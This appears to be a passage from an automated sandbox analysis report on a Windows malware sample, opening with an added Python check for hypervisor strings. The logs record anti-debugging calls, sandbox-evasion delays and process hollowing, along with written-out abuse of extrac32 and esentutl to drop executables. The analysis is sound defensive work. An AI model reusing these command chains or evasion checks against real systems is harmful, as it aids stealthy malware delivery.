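The WMI queries above enumerate Win32_BIOS, Win32_BaseBoard and Win32_Processor, the classes whose manufacturer, product and core-count values most readily reveal a hypervisor. The report does not show which strings the sample compares against, so the Python below is an added example, not code from the report or from the sample: it evaluates constructed WMI-style records against the well-known hypervisor markers (VMware, VirtualBox/innotek, QEMU, KVM, Xen, Hyper-V, Parallels, Bochs) and a low core count, so that an analyst can paste in what their own sandbox image returns (for example from Get-CimInstance -ClassName Win32_BIOS, Win32_BaseBoard and Win32_Processor) and see which fields to change before rerunning a sample like this one. The marker list and both records are the editor's assumptions.

```python
# Hypervisor vendor strings that VM-detection code commonly looks for in the
# three WMI classes enumerated above. Assumption: the sample's own string list
# is not in the report. "virtual" is last so the more specific names win.
VM_MARKERS = ("vmware", "virtualbox", "vbox", "innotek", "qemu", "kvm", "xen",
              "hyper-v", "bochs", "parallels", "virtual")

# Constructed WMI-style records (plain dicts, not live queries). "guest"
# imitates a VirtualBox VM, "host" imitates unremarkable physical hardware;
# every value is made up for this example.
SAMPLE_SYSTEMS = {
    "guest": {
        "Win32_BIOS": {"Manufacturer": "innotek GmbH",
                       "SMBIOSBIOSVersion": "VirtualBox",
                       "SerialNumber": "0"},
        "Win32_BaseBoard": {"Manufacturer": "Oracle Corporation",
                            "Product": "VirtualBox",
                            "SerialNumber": "0"},
        "Win32_Processor": {"Name": "Intel(R) Core(TM) i7 CPU",
                            "NumberOfCores": 1,
                            "NumberOfLogicalProcessors": 1},
    },
    "host": {
        "Win32_BIOS": {"Manufacturer": "Dell Inc.",
                       "SMBIOSBIOSVersion": "1.21.0",
                       "SerialNumber": "7ZX1Q43"},
        "Win32_BaseBoard": {"Manufacturer": "Dell Inc.",
                            "Product": "0K240Y",
                            "SerialNumber": "/7ZX1Q43/CN129636AK0008/"},
        "Win32_Processor": {"Name": "Intel(R) Core(TM) i7-8650U CPU @ 1.90GHz",
                            "NumberOfCores": 4,
                            "NumberOfLogicalProcessors": 8},
    },
}


def vm_indicators(system, min_cores=2):
    """Return (class, property, value, marker) for every field that betrays a VM.

    String properties are matched case-insensitively against VM_MARKERS;
    NumberOfCores below min_cores is reported as a separate indicator, since
    a single-core machine is itself a common sandbox tell.
    """
    hits = []
    for cls, props in system.items():
        for prop, value in props.items():
            if not isinstance(value, str):
                continue
            low = value.lower()
            for marker in VM_MARKERS:
                if marker in low:
                    hits.append((cls, prop, value, marker))
                    break
    cores = system.get("Win32_Processor", {}).get("NumberOfCores")
    if cores is not None and cores < min_cores:
        hits.append(("Win32_Processor", "NumberOfCores", cores, f"<{min_cores}"))
    return hits


def is_likely_vm(system, min_cores=2):
    """True if any field would lead checks like those above to flag a VM."""
    return bool(vm_indicators(system, min_cores))


if __name__ == "__main__":
    for name, system in SAMPLE_SYSTEMS.items():
        print(name, "likely VM:", is_likely_vm(system))
        for hit in vm_indicators(system):
            print("   ", hit)
```

Every hit on the "guest" record is a value an analyst can change in the sandbox image (BIOS and baseboard strings via the hypervisor's DMI/SMBIOS settings, the core count via the VM configuration); a record that comes back empty from this check, like "host", removes the signal these three queries give the sample, though it says nothing about the other checks the report lists (network adapters, debugger presence, timing).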
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\Public\Libraries\xrbjyllC.pif Last function: Thread delayed
Source: C:\Users\Public\Libraries\xrbjyllC.pif Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031C5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 3_2_031C5908
Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Code function: 13_2_0040128D RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,FindFirstFileA,FindClose,GetLocalTime, 13_2_0040128D
Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Code function: 13_2_00401612 RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,GetLocalTime,CreateDirectoryA,FindFirstFileA,MoveFileA,FindNextFileA,FindClose, 13_2_00401612
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 600000
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599875
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599766
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599656
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599547
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599438
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599313
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599203
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599094
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598969
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598860
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598735
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598610
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598485
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598360
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598222
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598068
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597946
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597844
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597719
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597610
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597485
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597360
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597235
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597110
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596981
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596875
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596767
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596640
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596528
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596416
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596304
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596188
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596050
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595938
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595810
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595698
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595585
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595249
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595123
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594911
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594789 Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594677 Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594564 Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594439 Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594313 Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594177 Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 593997 Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 593860 Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 593658 Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 593506 Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 593369 Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 593196 Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 593011 Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 592620 Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 592105 Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 591918 Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 591659 Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 600000
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599891
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599781
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599672
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599562
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599453
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599344
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599234
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599124
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599007
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598891
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598780
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598422
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598297
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598172
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598062
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597953
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597844
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597719
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597609
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597500
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597391
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597281
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597172
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597062
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596953
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596844
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596734
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596625
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596515
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596406
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596297
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596187
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596078
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595932
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595813
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595700
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595579
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595466
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595344
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595234
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595125
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595016
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594906
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594797
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594687
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594578
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594469
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594344
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594234
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594125
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 600000
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599889
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599781
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599671
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599562
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599453
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599343
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599234
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599125
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599015
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598906
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598796
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598686
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598578
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598461
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598310
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598185
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598078
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597968
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597859
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597750
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597640
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597531
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597421
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597312
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597203
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597093
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596981
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596875
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596765
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596656
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596546
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596437
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596328
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596218
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596109
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595999
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595890
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595781
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595671
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595562
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595453
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595343
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595234
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595125
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595015
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594891
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594765
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594656
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594546
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594437
Source: Cllyjbrx.PIF, 00000010.00000002.1997779443.0000000000887000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW7
Source: x.exe, 00000003.00000002.1721962152.000000000085E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1721962152.0000000000874000.00000004.00000020.00020000.00000000.sdmp, Cllyjbrx.PIF, 0000000A.00000002.1827777323.000000000064E000.00000004.00000020.00020000.00000000.sdmp, Cllyjbrx.PIF, 00000010.00000002.1997779443.0000000000848000.00000004.00000020.00020000.00000000.sdmp, Cllyjbrx.PIF, 00000010.00000002.1997779443.00000000008A1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Cllyjbrx.PIF, 0000000A.00000002.1827777323.000000000061C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`
Source: xrbjyllC.pif, 00000009.00000003.1838900521.000000002C2A7000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1887148378.000000002C2A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: xrbjyllC.pif, 00000011.00000003.2131319058.0000000025AB9000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2937690735.0000000025AB0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllc
Source: xrbjyllC.pif, 0000000B.00000003.1970886725.000000002A373000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000003.1970981133.000000002A383000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2040276262.000000002A370000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllww
Source: C:\Users\user\AppData\Local\Temp\x.exe API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\xrbjyllC.pif API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\xrbjyllC.pif Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031DF744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent, 3_2_031DF744
Source: C:\Users\user\AppData\Local\Temp\x.exe Process queried: DebugPort
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF Process queried: DebugPort
Source: C:\Users\Public\Libraries\xrbjyllC.pif Code function: 9_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_0040CE09
Source: C:\Users\Public\Libraries\xrbjyllC.pif Code function: 9_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear, 9_2_004019F0
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031D894C LoadLibraryW,GetProcAddress,FreeLibrary, 3_2_031D894C
Source: C:\Users\Public\Libraries\xrbjyllC.pif Code function: 9_2_0040ADB0 GetProcessHeap,HeapFree, 9_2_0040ADB0
Source: C:\Users\Public\Libraries\xrbjyllC.pif Process token adjusted: Debug
Source: C:\Users\Public\Libraries\xrbjyllC.pif Code function: 9_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_0040E61C
Source: C:\Users\Public\Libraries\xrbjyllC.pif Code function: 9_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_00416F6A
Source: C:\Users\Public\Libraries\xrbjyllC.pif Code function: 9_2_004123F1 SetUnhandledExceptionFilter, 9_2_004123F1
Source: C:\Users\Public\Libraries\xrbjyllC.pif Code function: 9_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_1_0040CE09
Source: C:\Users\Public\Libraries\xrbjyllC.pif Code function: 9_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_1_0040E61C
Source: C:\Users\Public\Libraries\xrbjyllC.pif Code function: 9_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_1_00416F6A
Source: C:\Users\Public\Libraries\xrbjyllC.pif Code function: 9_1_004123F1 SetUnhandledExceptionFilter, 9_1_004123F1
Source: C:\Users\Public\Libraries\xrbjyllC.pif Code function: 11_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_0040CE09
Source: C:\Users\Public\Libraries\xrbjyllC.pif Code function: 11_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_0040E61C
Source: C:\Users\Public\Libraries\xrbjyllC.pif Code function: 11_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_00416F6A
Source: C:\Users\Public\Libraries\xrbjyllC.pif Code function: 11_2_004123F1 SetUnhandledExceptionFilter, 11_2_004123F1
Source: C:\Users\Public\Libraries\xrbjyllC.pif Code function: 11_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_1_0040CE09
Source: C:\Users\Public\Libraries\xrbjyllC.pif Code function: 11_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_1_0040E61C
Source: C:\Users\Public\Libraries\xrbjyllC.pif Code function: 11_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_1_00416F6A
Source: C:\Users\Public\Libraries\xrbjyllC.pif Code function: 11_1_004123F1 SetUnhandledExceptionFilter, 11_1_004123F1
Source: C:\Users\Public\Libraries\xrbjyllC.pif Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\x.exe Memory allocated: C:\Users\Public\Libraries\xrbjyllC.pif base: 400000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF Memory allocated: C:\Users\Public\Libraries\xrbjyllC.pif base: 400000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif
Source: C:\Users\user\AppData\Local\Temp\x.exe Section unmapped: C:\Users\Public\Libraries\xrbjyllC.pif base address: 400000
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF Section unmapped: C:\Users\Public\Libraries\xrbjyllC.pif base address: 400000
Source: C:\Users\user\AppData\Local\Temp\x.exe Memory written: C:\Users\Public\Libraries\xrbjyllC.pif base: 3AF008
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF Memory written: C:\Users\Public\Libraries\xrbjyllC.pif base: 382008
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF Memory written: C:\Users\Public\Libraries\xrbjyllC.pif base: 283008
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\z1Transaction_ID_REF2418_cmd.bat" "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Users\Public\Libraries\xrbjyllC.pif C:\Users\Public\Libraries\xrbjyllC.pif
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF Process created: C:\Users\Public\Libraries\xrbjyllC.pif C:\Users\Public\Libraries\xrbjyllC.pif
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 3_2_031C5ACC
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: GetLocaleInfoA, 3_2_031CA7C4
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 3_2_031C5BD8
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: GetLocaleInfoA, 3_2_031CA810
Source: C:\Users\Public\Libraries\xrbjyllC.pif Code function: GetLocaleInfoA, 9_2_00417A20
Source: C:\Users\Public\Libraries\xrbjyllC.pif Code function: GetLocaleInfoA, 9_1_00417A20
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 10_2_031A5ACC
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 10_2_031A5BD7
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF Code function: GetLocaleInfoA, 10_2_031AA810
Source: C:\Users\Public\Libraries\xrbjyllC.pif Code function: GetLocaleInfoA, 11_2_00417A20
Source: C:\Users\Public\Libraries\xrbjyllC.pif Code function: GetLocaleInfoA, 11_1_00417A20
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 16_2_03195ACC
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 16_2_03195BD7
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF Code function: GetLocaleInfoA, 16_2_0319A810
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
